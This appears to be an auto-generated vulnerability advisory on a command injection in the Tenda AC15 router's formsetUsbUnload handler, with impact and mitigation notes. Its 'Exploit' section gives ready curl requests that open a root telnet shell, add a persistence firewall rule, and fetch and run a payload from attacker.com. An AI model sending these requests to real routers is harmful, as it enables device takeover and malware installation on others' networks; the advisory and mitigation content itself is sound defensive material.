Listen to this Post
The vulnerability is located in the `goform/formsetUsbUnload` handler of the Tenda AC15 router firmware version V15.03.05.18_multi. This handler is responsible for managing the unloading of USB devices. The function retrieves a user-supplied parameter named `v1` from an HTTP POST request. This `v1` parameter is then used in string concatenation operations to build a command string that is subsequently passed to the `doSystemCmd()` function for execution. The firmware code fails to implement any sanitization or validation checks on the content of the `v1` parameter. Due to this lack of input validation, an attacker can inject arbitrary operating system commands by appending shell metacharacters (such as ;, &&, or |) to the expected value of v1. When the unsanitized string is passed to doSystemCmd(), the injected commands are executed on the underlying operating system with the same high privileges as the web server process, typically root. This allows for complete compromise of the device.
dailycve form:
Platform: Tenda AC15
Version: V15.03.05.18_multi
Vulnerability : Command Injection
Severity: Critical
date: 03/02/2026
Prediction: 2026-04-15
What Undercode Say:
Analytics:
Search for the vulnerable firmware binary
find / -name ".bin" 2>/dev/null | grep "AC15.V15.03.05.18_multi"
Check if the router's web interface is listening on port 80/443
nmap -p 80,443 <target_ip>
Use strings to find the vulnerable function and command call in the extracted firmware
strings usb_unload.so | grep -A 5 -B 5 "doSystemCmd"
strings usb_unload.so | grep "formsetUsbUnload"
Simulate the vulnerable parameter concatenation (conceptual)
v1_user_input=""; crafted_v1="ext4; telnetd -l /bin/sh;"
In vulnerable code: doSystemCmd("umount /dev/%s", crafted_v1);
Exploit:
Exploit using curl to inject a command that starts a telnet server curl -X POST http://<router_ip>/goform/formsetUsbUnload \ -d "v1=ext4; telnetd -l /bin/sh;" Inject command to add a firewall rule for persistence curl -X POST http://<router_ip>/goform/formsetUsbUnload \ -d "v1=ext4; iptables -A INPUT -p tcp --dport 4444 -j ACCEPT;" Inject command to download and execute a malicious payload curl -X POST http://<router_ip>/goform/formsetUsbUnload \ -d "v1=ext4; wget http://attacker.com/malware -O /tmp/payload; chmod +x /tmp/payload; /tmp/payload;"
Protection from this CVE
Temporary workaround: Block access to the vulnerable endpoint via firewall iptables -A INPUT -p tcp --dport 80 -m string --string "/goform/formsetUsbUnload" --algo bm -j DROP ip6tables -A INPUT -p tcp --dport 80 -m string --string "/goform/formsetUsbUnload" --algo bm -j DROP Monitor logs for exploitation attempts tail -f /var/log/httpd.log | grep "formsetUsbUnload.[;&|`$]" Recommendation: Disable remote management if not needed Check vendor website for official patch: https://www.tenda.com.cn/material/show/2710
Impact:
- Remote Code Execution: Unauthenticated attackers on the network can execute arbitrary system commands.
- Full Device Compromise: Commands run with root privileges, giving the attacker full control over the router.
- Network Pivoting: The compromised router can be used as a foothold to attack other devices on the internal network.
- Persistent Malware: Attackers can install persistent malware, turning the router into a bot for DDoS attacks or a proxy for malicious traffic.
- Data Theft: All traffic passing through the router can be monitored, modified, or redirected.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

